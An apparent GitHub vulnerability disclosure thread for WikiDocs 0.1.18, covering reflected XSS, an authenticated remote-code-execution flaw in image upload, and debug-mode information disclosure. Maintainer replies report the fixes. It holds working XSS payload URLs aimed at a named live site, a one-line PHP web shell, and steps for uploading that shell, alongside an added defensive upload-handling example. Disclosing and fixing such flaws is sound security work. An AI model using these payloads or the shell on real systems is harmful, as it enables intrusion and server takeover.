WikiDocs
Multiple Vulnerabilities in WikiDocs 0.1.18
CVE-2022-23376 / Multiple reflected XSS vulnerabilities on different pages.
1. (Template.inc.php) - Reflected XSS Injection
First vulnerability in line 47:
Second is in line 210:
XSS directly using url: https://www.wikidocs.it/?search=%3Csvg/onload=%27alert(%22XSS%22);%27%3E
2. (Submit.php) - Reflected XSS Injection
Vulnerability in line 31:
XSS directly using url: https://www.wikidocs.it/submit.php?act=%22});%3C/script%3E%3Csvg/onload=%27alert(%22XSS%22);%27%3E
3. (Index.php) - Reflected XSS Injection:
CVE-2022-23375 / Authenticated remote code execution vulnerability
(Index.php) - Image upload, Authenticated Remote Code Execution:
First, log in to the website and click the edit button on the top right:
Before the upload process, we have to create a malicious payload image:
name: shell.php.png
payload:
<?php echo system($_REQUEST['cmd']); ?>
After that, you have to click image button on top and upload image:
Select malicious file and click upload:
In the upload process, change the file extension to PHP in the POST request:
then the browser automatically sends another request to the malicious file:
Just browse it and try to execute some commands:
Information Disclosure Vulnerability (I did not reserve CVE for this one)
(Functions.inc.php) - Debug mode can be enabled:
Vulnerable lines are between 15-18:
You can get sensitive information using debug mode:
I hope you will close these vulnerabilities ASAP.
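As an added example that is not part of the report or of WikiDocs' own code: a server-side upload handler that decides what a file is from its bytes and never reuses the client-supplied name, so swapping the extension to .php in the POST request has nothing to act on, plus an output-encoding helper for the reflected search field. The field name "image" and the upload directory are assumptions.

```php
<?php
// Added example, not WikiDocs code: server-side handling that closes the two
// classes of bug above. Field name "image" and the upload directory are assumed.
declare(strict_types=1);

// Only these sniffed content types are accepted; the stored extension is
// derived from the sniffed type, never from the client-supplied filename.
const ALLOWED_IMAGE_MIMES = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

/** Validate one $_FILES entry and store it under a server-chosen name. */
function storeUploadedImage(array $file, string $dir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed');
    }
    // 1. Decide the type from the bytes, not from $file['type'] or the name,
    //    both of which the request (and therefore the sender) controls.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset(ALLOWED_IMAGE_MIMES[$mime])) {
        throw new RuntimeException('Unsupported content type');
    }
    // 2. Defence in depth: the file must also decode as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('File does not decode as an image');
    }
    // 3. Discard the client name entirely ("shell.php.png", a .php extension
    //    swapped in mid-request, path separators); only the sniffed type sets
    //    the extension, so no stored file can end in .php.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_MIMES[$mime];
    $dest = rtrim($dir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0644);          // data, not an executable
    return $name;                // caller builds the URL from this name only
}

/** Output-encode a value before reflecting it into an HTML body or attribute. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Usage in the endpoints: uploads go through storeUploadedImage(), and the
// search term is reflected only through e():
//   $stored = storeUploadedImage($_FILES['image'], __DIR__ . '/uploads');
//   echo '<input name="search" value="' . e($_GET['search'] ?? '') . '">';
```

The upload directory should additionally be served with script execution disabled, so that a file the sniffer misclassifies is still never interpreted as PHP. A value reflected inside a script block, as with the act parameter in submit.php, needs JavaScript-context encoding (json_encode with the HTML-safe flags) rather than e().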
hi @nam3lum, thanks for the reports. I will provide as soon as possible ..
In version 0.1.20 I tried to fix the shell bug. Can you check if you can still hack it?
Actually, your application is more secure right now because it does not accept any extension 😃
Ok, can you try now please.. :) v0.1.21
Parameter to enable and disable debug mode for the Information Disclosure Vulnerability. v0.2.1
XSS needs to be fixed
https://www.wikidocs.it/?search=%3Csvg/onload=%27alert(%22XSS%22);%27%3E
https://www.wikidocs.it/submit.php?act=%22%7D);%3C/script%3E%3Csvg/onload=%27alert(%22XSS%22);%27%3E
fixed in refactored, release version up to 0.5.0
@nam3lum